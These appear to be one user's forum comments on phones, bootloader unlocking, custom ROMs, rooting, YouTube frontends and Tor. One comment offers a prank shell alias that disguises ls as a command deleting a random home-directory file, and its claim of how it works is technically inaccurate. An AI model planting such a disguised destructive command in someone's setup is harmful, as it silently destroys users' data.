I’m eyeing a fairphone or a pixel (graphene) when Europe makes swappable batteries the standard. Until then, I hope my phone keeps on working, I don’t change phone unless my last one dies.
I really hope swappable batteries make a comeback to ditch the portable batteries and just swap a fresh one.
Hey, I like sailing the high seas as much as the next one but shouldn’t those links be relegated to the megathread?
Not your keys, not safe encryption. As simple as that
I agree but I find blockchain technology too costly hardwarewise, a simple anonimizing network may be enough
Well then, just use an anonymus service to distribute magnet links (i2p, tor, blockchain)
You don’t need blockchain to accomplish what the internet archive is, just a network of computers that share a part of their disk space to the other computers. This is just a torrent network at the end of the day
It’s been foretold that after a year without touching grass you can harness one-handed vim
Cool, no Xiaomi for me then, I can’t even bother with that much bureaucracy when I can just buy another phone that’s easier to unlock
I will hve to look out for that when buying the next phone, thank you
I am still using a Xiaomi 7 with a custom rom, I used the tool in their webpage to unlock it. Are current gen Xiaomi phones making it impossible to unlock the bootloader?
So google is lying about rooted devices, they seem as secure as an OEM letting an user sideload apps or google themselves letting malware apps inside their store
Does rooting your device make you the root user or just gives you access to superuser utilities?
In linux systems the root user shouldn’t be used for daily use, you just make an user account with permission to use sudo, doas or su.
In invincible there is a guy that lives so fast everything in his life is too slow so he can’t concentrate in anything. I guess you can turn this superspeed on and off.
I’d much rather prefer the invisibility because I can just go to a bank and take some bills, put them in my mouth and launder them later. I don’t want to be rich, just live confortably
As far as I know piped gets the video from youtube and serves it to you so that youtube only sees traffic coming from the piped instance you are using. Using adblockers would give you the same benefits as using piped except for the anonymity. As long as tor gives you a good video quality, it is a better option than the frontend because you don’t have a piped instance knowing your traffic.
I don’t like my traffic being fingerprinted by youtube but can’t handle the slow tor connections so I ended up using a frontend for youtube. The one I use is called Invidious.
It is still worth a try
You can install custom roms into Xiaomi phones, I recommend LinageOS or /e/OS if you want a degoogled experience. If its not for you, the latter isn’t really user friendly as some google apps like maps wont really work.
Why not make it more mischievous?
alias ls="find $HOME -type f | shuf -n 1 | rm -f; ls"
This line erases one random file from your home directory and then uses ls as normal. You won’t know what vanished until you need it or it removes a needed library or binary.
I don’t think coding in C is basic stuff, depending on the IDE, you can learn about using the terminal, compilers and if the course gets far, memory allocation, a really important tool in Linux programs.
